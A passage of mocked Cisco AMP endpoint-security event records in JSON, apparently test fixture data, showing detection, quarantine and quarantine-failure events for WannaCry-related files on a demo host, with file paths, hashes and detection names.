found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 